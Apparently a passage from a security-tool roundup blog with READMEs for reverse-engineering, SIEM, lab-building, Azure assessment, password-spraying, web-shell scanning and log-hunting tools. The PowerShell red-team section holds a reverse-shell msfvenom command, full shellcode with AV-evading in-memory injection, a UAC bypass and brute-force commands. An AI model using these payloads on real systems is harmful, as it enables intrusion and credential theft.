  • firmware.fpt : this file contains the addresses of the pointers to the identified functions

You can now start IDA Pro again (or any reverse engineering software), load the firmware at the specified address and import the addresses of the 1545 identified functions:

  • Load the firmware in IDA Pro at the specified address (in this example 0x80010000)
  • From the File menu, choose Script File and select import_entry_points.py
  • Select the .fad file
  • Select the .fpt file

Note:

binbloom will start by determining the endianness, as this information is needed to look for the arrays of functions pointers. If the automatic analysis of the endianness is wrong, you can override its result with the following option:

-E b: force big endian mode

-E l: force little endian mode


Find the UDS database (for an ECU's firmware)

binbloom can try to search an array containing UDS/KWP2000 IDs, with the -u option:

binbloom -f firmware.bin -u

This command should give an output like this:

Loaded firmware.bin, size:1540096, bit:ffe00000, 001fffff, nb_segments:2048, shift:21
End address:00178000
UDS DB position: 1234 with a score of 12 and a stride of 12:
10 00 31 00 26 27 00 80 00 00 00 00
11 00 31 00 24 3d 01 80 00 00 00 00
22 00 10 00 2c 42 01 80 00 00 00 00
27 00 10 00 1c 41 01 80 60 a8 01 80
28 00 31 00 36 7f 01 80 00 00 00 00
2e 00 10 00 18 88 01 80 08 ae 01 80
31 00 30 00 10 41 01 80 00 00 00 00
34 00 10 00 46 4e 01 80 00 00 00 00
36 00 10 00 2a 2d 01 80 00 00 00 00
37 00 10 00 32 3c 00 80 00 00 00 00
3e 00 31 00 54 5b 01 80 00 b2 01 80
85 00 31 00 6a 2f 01 80 00 00 00 00

This output shows that at address 0x1234, a potential UDS database was found with a stride of 12 (meaning that UDS IDs are present in an array in which each element is 12-byte long). In this example, the UDS IDs are in the first column (10, 11, 22, 27, 28, 2e, 31, 34, 36, 37, 3e and 85).

The list of supported UDS IDs is hard-coded in binbloom.c, you can change it if needed.

This analysis is based on heuristics so it can give false positives. You have to read the list of potential UDS databases found by binbloom and check and see which one is the correct one, if any.

In this example, we can see that there is a pointer in little endian in each line (26 27 00 80 for the first line, which corresponds to address 0x80002726). There is probably a function at this address to manage UDS command 10. You have to disassemble the code to make sure, and search for cross-references to this UDS database.


About

Authors

Guillaume Heilles (@PapaZours)


License

binbloom is provided under the Apache 2.0 license.



Nethive-Project - Restructured And Collaborated SIEM And CVSS Infrastructure

$
0
0


The Nethive Project provides a Security Information and Event Management (SIEM) insfrastructure empowered by CVSS automatic measurements.




Features
  • Machine Learning powered SQL Injection Detection
  • Server-side XSS Detection based on Chrome's XSS Auditor
  • Post-exploitation Detection powered by Auditbeat
  • Bash Command History Tracker
  • CVSS Measurement on Detected Attacks
  • Realtime Log Storing powered by Elasticsearch and Logstash
  • Basic System Monitoring
  • Resourceful Dashboard UI
  • Notify Suspicious Activity via Email

Installation

Before installing, please make sure to install the pre-requisites.

You can install Nethive from PyPi package manager using the following command:

[Coming Soon!]

or

You can install Nethive using the latest repository:

$ git clone https://github.com/chrisandoryan/Nethive-Project.git
$ cd Nethive-Project/
$ sudo bash install.sh
$ sudo pip3 install -r requirements.txt

Please make sure all dependencies are installed if anyone of the above fails. For more detailed information, refer to the installation guide.


Quick Start



  1. Fetch and start nethive-cvss docker container

    $ git clone https://github.com/Falanteris/docker-nethive-cvss/
    $ cd docker-nethive-cvss/
    $ docker build -t nethive-cvss .
    $ ./cvss
  2. Start Nethive and copy default configuration

    $ cd Nethive-Project/
    $ cp .env.example .env
  3. Activate all Nethive processing engines: $ sudo python3 main.py .
    On the menu prompt, choose [3] Just-Run-This-Thing, then wait for the engines to be initialized.

  4. Start Nethive UI Server

    $ cd Nethive-Project/dashboard/
    $ npm install && npm start
  5. Go to http://localhost:3000/




APICheck - The DevSecOps Toolset For REST APIs

$
0
0


APICheck is a complete toolset designed and created for testing REST APIs.


Why APICheck

APICheck focuses not only in the security testing and hacking use cases. The goal of the project is to become a complete toolset for DevSecOps cycles.

The tools are aimed to diverse users profiles:

  • Developers
  • System Administrators
  • Security Engineers & Penetration Testers

Documentation

Here you can find the complete documentation.


Authors

APICheck is being developed by BBVA Innovation Security Labs team.



PowerShell-Red-Team - Collection Of PowerShell Functions A Red Teamer May Use To Collect Data From A Machine

$
0
0


Collection of PowerShell functions a Red Teamer may use to collect data from a machine or gain access to a target. I added ps1 files for the commands that are included in the RedTeamEnum module. This will allow you to easily find and use only one command if that is all you want. If you want the entire module perform the following actions after downloading the RedTeamEnum directory and contents to your device.


C:\PS> robocopy .\RedTeamEnum $env:USERPROFILE\Documents\WindowsPowerShell\Modules\RedTeamEnum *
# This will copy the module to a location that allows you to easily import it. If you are using OneDrive sync you may need to use $env:USERPROFILE\OneDrive\Documents\WindowsPowerShell\Modules\RedTeamEnum instead.

C:\PS> Import-Module -Name RedTeamEnum -Verbose
# This will import all the commands in the module.

C:\PS> Get-Command -Module RedTeamEnum
# This will list all the commands in the module.
  • Convert-Base64.psm1 is a function as the name states for encoding and/or decoding text into Base64 format.
C:\PS> Convert-Base64 -Value "Convert me to base64!" -Encode

C:\PS> Convert-Base64 -Value "Q29udmVydCBtZSB0byBiYXNlNjQh" -Decode
  • Convert-SID.ps1 is a function that converts SID values to usernames and usernames to SID values
C:\PS> Convert-SID -Username tobor
# The above example converts tobor its SID value

C:\PS> Convert-SID -SID S-1-5-21-2860287465-2011404039-792856344-500
# The above value converts the SID value to its associated username
  • Test-BruteZipPassword is a function that uses a password file to brute force a password protected zip file using 7zip
C:\PS> Test-BruteForceZipPassword -PassFile 'C:\Users\USER\Downloads\Applications\pass.txt' -Path 'C:\Users\USER\Downloads\Applications\KiTTY.7z' -ZipExe 'C:\Program Files\7-Zip\7z.exe'
# This example uses the passwords in the pass.txt file to crack the password protected KiTTY.7z file
  • Test-BruteForceCredentials is a function that uses WinRM to brute force a users password.
C:\PS> Test-BruteForceCredentials -ComputerName DC01.domain.com -UseSSL -Username 'admin','administrator' -Passwd 'Password123!' -SleepMinutes 5
# This example will test the one password defined against both the admin and administrator users on the remote computer DC01.domain.com using WinRM over HTTPS with a time interval of 5 minutes between each attempt

C:\PS> Test-BruteForceCredentials -ComputerName File.domain.com -UserFile C:\Temp\users.txt -PassFile C:\Temp\rockyou.txt
# This example will test every password in rockyou.txt against every username in the users.txt file without any pause between tried attempts
  • Get-LdapInfo is a function I am very proud of for performing general LDAP queries. Although only two properties will show in the output, all of the properties associated with object can be seen by piping to Select-Object -Property * or using the -Detailed switch parameter.
C:\PS> Get-LdapInfo -Detailed -SPNNamedObjects
# The above returns all the properties of the returned objects
#
C:\PS> Get-LdapInfo -DomainControllers | Select-Object -Property 'Name','ms-Mcs-AdmPwd'
# If this is run as admin it will return the LAPS password for the local admin account
#
C:\PS> Get-LdapInfo -ListUsers | Where-Object -Property SamAccountName -like "user.samname"
# NOTE: If you include the "-Detailed" switch and pipe the output to where-object it will not return any properties. If you wish to display all the properties of your result it will need to be carried out using the below format
#
C:\PS> Get-LdapInfo -AllServers | Where-Object -Property LogonCount -gt 1 | Select-Object -Property *
  • Get-NetworkShareInfo is a cmdlet that is used to retrieve information and/or brute force discover network shares available on a remote or local machine
C:\PS> Get-NetworkShareInfo -ShareName C$
# The above example returns information on the share C$ on the local machine
#RESULTS
Name : C$
InstallDate :
Description : Default share
Path : C:\
ComputerName : TOBORDESKTOP
Status : OK

C:\PS> Get-NetworkShareInfo -ShareName NETLOGON,SYSVOL,C$ -ComputerName DC01.domain.com, DC02.domain.com, 10.10.10.1
# The above example disocvers and returns information on NETLOGON, SYSVOL, and C$ on the 3 remote devices DC01, DC02, and 10.10.10.1
  • Test-PrivEsc is a function that can be used for finding whether WSUS updates over HTTP are vulnerable to PrivEsc, Clear Text credentials are stored in common places, AlwaysInstallElevated is vulnerable to PrivEsc, Unquoted Service Paths exist, and enum of possible weak write permissions for services.
 C:\PS> Test-PrivEsc
  • Get-InitialEnum is a function for enumerating the basics of a Windows Operating System to help better display possible weaknesses.
 C:\PS> Get-InitialEnum
  • Start-SimpleHTTPServer is a function used to host an HTTP server for downloading files. It is meant to be similart to pythons SimpleHTTPServer module. Directories are not traversable through the web server. The files that will be hosted for download will be from the current directory you are in when issuing this command.
C:\PS> Start-SimpleHTTPServer
Open HTTP Server on port 8000

#OR
C:\PS> Start-SimpleHTTPServer -Port 80
# Open HTTP Server on port 80
  • Invoke-PortScan.ps1 is a function for scanning all possible TCP ports on a target. I will improve in future by including UDP as well as the ability to define a port range. This one is honestly not even worth using because it is very slow. Threading is a weak area of mine and I plan to work on that with this one.
 C:\PS> Invoke-PortScan -IpAddress 192.168.0.1
  • Invoke-PingSweep is a function used for performing a ping sweep of a subnet range.
C:\PS> Invoke-PingSweep -Subnet 192.168.1.0 -Start 192 -End 224 -Source Singular
# NOTE: The source parameter only works if IP Source Routing value is "Yes"

C:\PS> Invoke-PingSweep -Subnet 10.0.0.0 -Start 1 -End 20 -Count 2
# Default value for count is 1

C:\PS> Invoke-PingSweep -Subnet 172.16.0.0 -Start 64 -End 128 -Count 3 -Source Multiple
  • Invoke-UseCreds is a function I created to simplify the process of using obtained credentials during a pen test. I use -Passwd instead of -Password because that parameter when defined should be configured as a secure string which is not the case when entering a value into that filed with this function. It gets converted to a secure string after you set that value.
# The below command will use the entered credentials to open the msf.exe executable as the user tobor
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\msf.exe -Verbose
  • Invoke-FodHelperBypass is a function that tests whether or not the UAC bypass will work before executing it to elevate priviledges. This of course needs to be run by a member of the local administrators group as this bypass elevates the priviledges of the shell you are in. You can define the program to run which will allow you to execute generaate msfvenom payloads as well as cmd or powershell or just issuing commands.
C:\PS> Invoke-FodHelperBypass -Program "powershell" -Verbose
# OR
C:\PS> Invoke-FodHelperBypass -Program "cmd /c msf.exe" -Verbose
  • Invoke-InMemoryPayload is used for AV Evasion using an In-Memory injection. This will require the runner to generate an msfvenom payload using a command similar to the example below, and entering the "[Byte[]] $buf" variable into Invoke-InMemoryPayloads "ShellCode" parameter.
# Generate payload to use
msfvenom -p windows/meterpreter/shell_reverse_tcp LHOST=192.168.137.129 LPORT=1337 -f powershell

Start a listener, use that value in the "ShellCode" parameter, and run the command to gain your shell. This will also require certain memory protections to not be enabled. NOTE: Take note there are NOT ANY DOUBLE QUOTES around the ShellCode variables value. This is because it is expecting a byte array.

C:\PS> Invoke-InMemoryPayload -Payload 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x5   9,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x5,0x39,0xc0,0xa8,0x89,0x81,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x   41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5 -Verbose




Adaz - Automatically Deploy Customizable Active Directory Labs In Azure

$
0
0


This project allows you to easily spin up Active Directory labs in Azure with domain-joined workstations, Windows Event Forwarding, Kibana, and Sysmon using Terraform/Ansible.


It exposes a high-level configuration file for your domain to allow you to customize users, groups and workstations.

dns_name: hunter.lab
dc_name: DC-1

initial_domain_admin:
username: hunter
password: MyAdDomain!

organizational_units: {}

users:
- username: christophe
- username: dany

groups:
- dn: CN=Hunters,CN=Users
members: [christophe]

default_local_admin:
username: localadmin
password: Localadmin!

workstations:
- name: XTOF-WKS
local_admins: [christophe]
- name: DANY-WKS
local_admins: [dany]

enable_windows_firewall: yes

Features
  • Windows Event Forwarding pre-configured
  • Audit policies pre-configured
  • Sysmon installed
  • Logs centralized in an Elasticsearch instance which can easily be queried from the Kibana UI
  • Domain easily configurable via YAML configuration file

Here's an incomplete and biaised comparison with DetectionLab:

AdazDetectionLab
Public cloud supportAzureAWS, Azure (beta)
Expected time to spin up a lab15-20 minutes25 minutes
Log management& queryingElasticsearch+KibanaSplunk Enterprise
WEF
✔️
✔️
Audit policies
✔️
✔️
Sysmon
✔️
✔️
YAML domain configuration file
✔️
Multiple Windows 10 workstations support
✔️
VirtualBox/VMWare support
✔️
osquery / fleet
(vote!)
✔️
Powershell transcript logging
(vote!)
✔️
IDS logs
(vote!)
✔️

Use-cases
  • Detection engineering: Having access to clean lab with a standard is a great way to understand what traces common attacks and lateral movement techniques leave behind.

  • Learning Active Directory: I often have the need to test GPOs or various AD features (AppLocker, LAPS...). Having a disposable lab is a must for this.


Screenshots

 



Getting started

Prerequisites
  • An Azure subscription. You can create one for free and you get $200 of credits for the first 30 days. Note that this type of subscription has a limit of 4 vCPUs per region, which still allows you to run 1 domain controller and 2 workstations (with the default lab configuration).

  • A SSH key in ~/.ssh/id_rsa.pub

  • Terraform>= 0.12

  • Azure CLI

  • You must be logged in to your Azure account by running az login. Yu can use az account list to confirm you have access to your Azure subscription


Installation
  • Clone this repository
git clone https://github.com/christophetd/Adaz.git
  • Create a virtual env and install Ansible dependencies
# Note: the virtual env needs to be in ansible/venv
python3 -m venv ansible/venv
source ansible/venv/bin/activate
pip install -r ansible/requirements.txt
deactivate
  • Initialize Terraform
cd terraform
terraform init

Usage

Optionally edit domain.yml according to your needs (reference here), then run:

terraform apply

Resource creation and provisioning takes 15-20 minutes. Once finished, you will have an output similar to:

dc_public_ip = 13.89.191.140
kibana_url = http://52.176.3.250:5601
what_next =
####################
### WHAT NEXT? ###
####################

Check out your logs in Kibana:
http://52.176.3.250:5601

RDP to your domain controller:
xfreerdp /v:13.89.191.140 /u:hunter.lab\\hunter '/p:Hunt3r123.' +clipboard /cert-ignore

RDP to a workstation:
xfreerdp /v:52.176.5.229 /u:localadmin '/p:Localadmin!' +clipboard /cert-ignore


workstations_public_ips = {
"DANY-WKS" = "52.165.182.15"
"XTOF-WKS" = "52.176.5.229"
}

Don't worry if during the provisioning you see a few messages looking like FAILED - RETRYING: List Kibana index templates (xx retries left)

By default, resources are deployed in the West Europe region under a resource group ad-hunting-lab. You can control the region with a Terraform variable:

terraform apply -var 'region=East US 2'

Documentation

Roadmap

I will heavily rely on the number of thumbs up votes you will leave on feature-proposal issues for the next features!


Suggestions and bugs

Feel free to open an issue or to tweet @christophetd.



PowerZure - PowerShell Framework To Assess Azure Security

$
0
0


For a list of functions, their usage, and more, check out https://powerzure.readthedocs.io

What is PowerZure?

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissanceandexploitation of Azure, AzureAD, and the associated resources.


CLI vs. Portal

A common question is why use PowerZure or command line at all when you can just login to the Azure web portal?

This is a fair question and to be honest, you can accomplish 90% of the functionality in PowerZure through clicking around in the portal, however by using the Azure PowerShell modules, you can perform tasks programmatically that are tedious in the portal. E.g, listing the groups a user belongs to. In addition, the ability to programmatically upload exploits instead of tinkering around with the messy web UI. Finally, if you compromise a user who has used the PowerShell module for Azure before and are able to steal the accesstoken.json file, you can impersonate that user which effectively bypasses multi-factor authentication.


Why PowerShell?

While the offensive security industry has seen a decline in PowerShell usage due to the advancements of defensive products and solutions, this project does not contain any malicious code. PowerZure does not exploit bugs within Azure, it exploits misconfigurations.

C# was also explored for creating this project but there were two main problems:

  1. There were at least four different APIs being used for the project. MSOL, Azure REST, Azure SDK, Graph.

  2. The documentation for these APIs simply was too poor to continue. Entire methods missing, namespaces typo’d, and other problems begged the question of what advantage did C# give over PowerShell (Answer: none)

Realistically, there is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure CLI.


Requirements

The "Az" Azure PowerShell module is the primary module used in PowerZure, as it handles most requests interacting with Azure resources. The Az module interacts using the Azure REST API.

The AzureAD PowerShell Module is also used and is for handling AzureAD requests. The AzureAD module uses the Microsoft Graph API.


Author

Author: Ryan Hausknecht (@haus3c)




Trident - Automated Password Spraying Tool

$
0
0


The Trident project is an automated password spraying tool developed to meet the following requirements:

  • the ability to be deployed on several cloud platforms/execution providers

  • the ability to schedule spraying campaigns in accordance with a target’s account lockout policy

  • the ability to increase the IP pool that authentication attempts originate from for operational security purposes

  • the ability to quickly extend functionality to include newly-encountered authentication platforms


Architecture


 

This diagram was generated using Diagrams. The Go gopher was designed by Renee French and is licensed under CC BY 3.0.


Deployment

Deploying trident requires a Google Cloud project, a domain name (for the orchestrator API), and a Cloudflare Access configuration for this domain. Cloudflare Access is used to authenticate requests to the orchestrator API.

brew install cloudflare/cloudflare/cloudflared
brew install terraform
cd terraform
cloudflared login
terraform init
terraform plan
terraform apply

Installation

Trident has a command line interface available in the releases page. Alternatively, you can download and install trident-client via go get:

GO111MODULE=on go get github.com/praetorian-inc/trident/cmd/trident-client

Usage

Config

The trident-client binary sends API requests to the orchestrator. It reads from ~/.trident/config.yaml, which has the following format:

orchestrator-url: https://trident.example.org
providers:
okta:
subdomain: example
adfs:
domain: adfs.example.org
o365:
domain: login.microsoft.com

Campaigns

With a valid config.yaml, the trident-client can be used to create password spraying campaigns, as shown below:

trident-client campaign -u usernames.txt -p passwords.txt --interval 5s --window 120s

The --interval option allows the operator to insert delays between credential attempts. The --window option allows the operator to set a hard stop time for the campaign. Additional arguments are documented below:

Usage:
trident-cli campaign [flags]

Flags:
-a, --auth-provider string this is the authentication platform you are attacking (default "okta")
-h, --help help for campaign
-i, --interval duration requests will happen with this interval between them (default 1s)
-b, --notbefore string requests will not start before this time (default "2020-09-09T22:31:38.643959-05:00")
-p, --passfile string file of passwords (newline separated)
-u, --userfile string file of usernames (newline separated)
-w, --window duration a duration that this campaign will be active (ex: 4w) (default 672h0m0s)

Results

The results subcommand can be used to query the result table. This subcommand has several options, but defaults to showing all valid credentials across all campaigns.

$ trident-client results
+----+-------------------+------------+-------+
| ID | USERNAME | PASSWORD | VALID |
+----+-------------------+------------+-------+
| 1 | alice@example.org | Password1! | true |
| 2 | bob@example.org | Password2! | true |
| 3 | eve@example.org | Password3! | true |
+----+-------------------+------------+-------+

Additional arguments are documented below:

Usage:
trident-cli results [flags]

Flags:
-f, --filter string filter on db results (specified in JSON) (default '{"valid":true}')
-h, --help help for results
-o, --output-format string output format (table, csv, json) (default "table")
-r, --return string the list of fields you would like to see from the results (comma-separated string) (default "*")


Webshell-Analyzer - Web Shell Scanner And Analyzer

$
0
0


Web shell analyzer is a cross platform stand-alone binary built solely for the purpose of identifying, decoding, and tagging files that are suspected to be web shells. The web shell analyzer is the bigger brother to the web shell scanner project (http://github.com/tstillz/webshell-scan), which only scans files via regex, no decoding or attribute analysis.


Disclaimer

The regex and its built-in decoding routines supplied with the scanner are not guaranteed to find every web shell on disk and maybe identify some false positives. It's also recommended you test the analyzer and assess its impact before running on production systems. The analyzer has no warranty, use as your own risk.


Features
  • Cross platform, statically compiled binary.
  • JSON output
  • Currently supports most PHP, ASP/X web shells. JSP/X, CFM and other types are in the works.
  • Recursive, multi-threaded scanning capable of iterating through nested directories quickly
  • Ability to handle multiple layers of obfuscated web shells such as base64, gzinflate and char code.
  • Supports PRE/POST actions which powers layered de-obfuscated and decoding for the analysis engine
  • Tunable regex logic with modular interfaces to easily extend the analyzers capabilities
  • Tunable attribute tagging
  • Raw content captures upon match
  • System Info
  • Tested against the web shell repo: https://github.com/tennc/webshell

PRE/POST Actions

Every file that is scanned can be run through PRE and/or POST action:

  • PRE-Decoding: Functions invoked BEFORE matching is performed, such as base64 decoding or string replacement.
  • POST-Decoding: Functions invoked AFTER matching is performed, such as url defanging.

The idea behind PreDecodeActions functions were to use regex to identify a matching string or pattern, acquire its raw match contents, perform defined decoding/cleanup steps and send the final output back to the analysis engine for re-scanning/processing. A very simple example of this is Base64 decoding. In order to check for any detection logic against a base64 encoded web shell, we must first remove any/all layers of base64. Todo this, we could use the following PreDecodeAction:

{
Name: "PHP_Base64Decode",
Regex: *regexp.MustCompile(`(?i)(?:=|\s+)(base64_decode\('('?\"?[A-Za-z0-9+\/=]+'?\"?))`),
DataCapture: *regexp.MustCompile(`(?i)((?:'|")[A-Za-z0-9+\/=]+(?:'|"))`),
PreDecodeActions: []cm.Action{
{Function: cm.StringReplace, Arguments: []interface{}{"\"", "", -1}},
{Function: cm.StringReplace, Arguments: []interface{}{"'", "", -1}},
},
Functions: []cm.Base_Func{cm.DecodeBase64},
},

Looking at the block above, we first have the name of the function, the regex used to match, data capture regex (sometimes you may want to tweak what to capture vs what matches) and PreDecodeActions. In this case, BEFORE the function cm.DecodeBase64 is applied to the matching text, the system will first remove the following items " and '. PostDecodeActions works the opposite, where the output is checked AFTER decoding is performed. Using this model, we can make multiple custom decoders that have infinite PRE/POST and decoding functions to handle most web shell analysis needs.


Detections

A detection is a regex accompanied by a name and description. The idea behind this model was to make detections modular and scalable and kept context with the actual detection. Detections share the same format as attributes, minus attributes cannot generate a detection, they can only add context to an existing detection. Lets look at the example detect logic block below:

{
Name: "Generic_Embedded_Executable",
Description: "Looks for magic bytes associated with a PE file",
Regex: *regexp.MustCompile(`(?i)(?:(?:0x)?4d5a)`),
},

Based on the regex, we can see its looking for an embedded Windows PE file based off the magic header bytes 4D 5A. If found, this would lead to a detection and a JSON report would be generated for the file. Currently, detections are applied based on file extension or generically for all file types. For example, decoding routines for PHP are defined under cm.GlobalMap.Function_Php and tags for either attributes are defined under cm.GlobalMap.Tags_Php. The functions cm.GlobalMap.Function_Generics and tags under cm.GlobalMap.Tags_Generics apply to ALL web shell extensions as a catch all.


Attributes

Attribute tagging is a new concept I created that adds "context" to an existing web shell detection. Attributes alone cannot currently generate a detection on their own. In a traditional scan engine, a scanner would only alert if a web shell was detected but provide little to no additional context into what capabilities (attributes) the web shell potentially has. Attribute tags work the same as detection logic, however they only show after a detection has been identified and cannot generate detections on their own. Looking at the example logic below:

cm.GlobalMap.Tags_Php = []cm.TagDef{
{
Name: "PHP_Database_Operations",
Description: "Looks for common PHP functions used for interacting with a database.",
Regex: *regexp.MustCompile(`(?i)(?:'mssql_connect\|mysql_exec\()`),
Attribute: true,
},
}

We see that under the struct Tags_Php, we have created a new PHP tag. When a match is found during scanning, the Attribute flag is checked and if set to True, the detected web shell will have the tag PHP_Database_Operations appended to its JSON report along with the frequency and matching text block, as shown in the example output below:

{
"filePath": "/testers/1.php",
"size": 66109,
"md5": "6793d8ebab93e5a0f91e5a331221f331",
"timestamps": {
"birth": "2019-02-03 02:02:22",
"created": "2020-07-29 02:50:15",
"modified": "2019-02-03 02:02:22",
"accessed": "2020-07-29 02:51:07"
},
"matches": {
"FilesMAn": 5,
"FilesMan": 29,
"cmd": 20,
"eval(": 4,
"exec(": 2,
"ipconfig": 1,
"netstat": 2,
"passthru(": 1,
"shell_exec(": 1
},
"decodes": {
"Generic_Base64Decode": 40,
"Generic_Multiline_Base64Decode": 165
},
"tags": {
"Generic_Embedding_Code_C": {
"bind(": 2,
"listen(": 2
},
"PHP_Banned_Function": {
"exec(": 3,
"get_current_user(": 1,
"getmyuid(": 1,
"link(": 7,
"listen(": 2,
"passthru(": 1,
"realpath(": 1,
"set_time_limit(": 1
},
"PHP_Database_Operations": {
"mysql_query(": 1
},
"PHP_Disk_Operations": {
"@chmod(": 1,
"@filegroup(": 4,
"@fileowner(": 4,
"@rename(": 2,
"fopen(": 7,
"fwrite(": 6
}
}
}

These tags not only help define what a web shell can do, but it helps teams such as IR consultants performing live response engagements a pivot point into where to potentially look next.


Requirements

None! Simply download the binary for your OS, supply the directory you wish to scan (other arguments are optional) and let it rip.


Running the binary

Running wsa with no arguments shows the following options:

/Users/beastmode$ ./wsa
Options:
-dir string
Directory to scan for web shells
-raw_contents
If a match is found, grab the raw contents and base64 + gzip compress the file into the JSON object.
-size int
Specify max file size to scan (default is 10 MB) (default 10)
-verbose bool
If set to true, the analyzer will print all files analyzer, not just matches

The only required argument is dir. You can override the other program defaults if you wish.

The output of the analyser will be written to console (standard output). Example below (For best results, send stdout to a json file and review/post process offline):

Linux: ./wsa -dir /opt/www
Windows: wsa.exe -dir C:\Windows\Inetput\wwwroot

### With STDOUT and full web shell file encoded and compressed:
Linux: ./wsa -dir /opt/www -raw_contents=true > scan_results.json

Once the analyzer finishes, it will output the overall scan metrics to STDOUT, as shown in the example below:

{"scanned":311,"matches":122,"noMatches":189,"directory":"/webshell-master/php","scanDuration":1.4757737378333333,"systemInfo":{"hostname":"Beast","envVars":[""],"username":"beastmode","userID":"501","realName":"The Beast","userHomeDir":"/Users/beastmode"}}


Building the project from source

If you decide to modify the source code, you can build the project using the following commands:

cd <path-to-project>

## Windows
GOOS=windows GOARCH=386 go build -o wsa32.exe main.go
GOOS=windows GOARCH=amd64 go build -o wsa64.exe main.go

## Linux
GOOS=linux GOARCH=amd64 go build -o wsa_linux64 main.go

## Darwin
GOOS=darwin GOARCH=amd64 go build -o wsa_darwin64 main.go


DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs

$
0
0


DeepBlueCLI - a PowerShell Module for Threat Hunting via Windows Event Logs

Eric Conrad, Backshore Communications, LLC

deepblue at backshore dot net

Twitter: @eric_conrad

http://ericconrad.com

Sample evtx files are in the .\evtx directory


Usage:

.\DeepBlue.ps1 <event log name> <evtx filename>

See the Set-ExecutionPolicy Readme if you receive a 'running scripts is disabled on this system' error.


Process local Windows security event log (PowerShell must be run as Administrator):

.\DeepBlue.ps1

or:

.\DeepBlue.ps1 -log security


Process local Windows system event log:

.\DeepBlue.ps1 -log system


Process evtx file:

.\DeepBlue.ps1 .\evtx\new-user-security.evtx


Windows Event Logs processed
  • Windows Security
  • Windows System
  • Windows Application
  • Windows PowerShell
  • Sysmon

Command Line Logs processed

See Logging setup section below for how to configure these logs

  • Windows Security event ID 4688
  • Windows PowerShell event IDs 4103 and 4104
  • Sysmon event ID 1

Detected events
  • Suspicious account behavior
    • User creation
    • User added to local/global/universal groups
    • Password guessing (multiple logon failures, one account)
    • Password spraying via failed logon (multiple logon failures, multiple accounts)
    • Password spraying via explicit credentials
    • Bloodhound (admin privileges assigned to the same account with multiple Security IDs)
  • Command line/Sysmon/PowerShell auditing
    • Long command lines
    • Regex searches
    • Obfuscated commands
    • PowerShell launched via WMIC or PsExec
    • PowerShell Net.WebClient Downloadstring
    • Compressed/Base64 encoded commands (with automatic decompression/decoding)
    • Unsigned EXEs or DLLs
  • Service auditing
    • Suspicious service creation
    • Service creation errors
    • Stopping/starting the Windows Event Log service (potential event log manipulation)
  • Mimikatz
    • lsadump::sam
  • EMET & Applocker Blocks

...and more


Examples
EventCommand
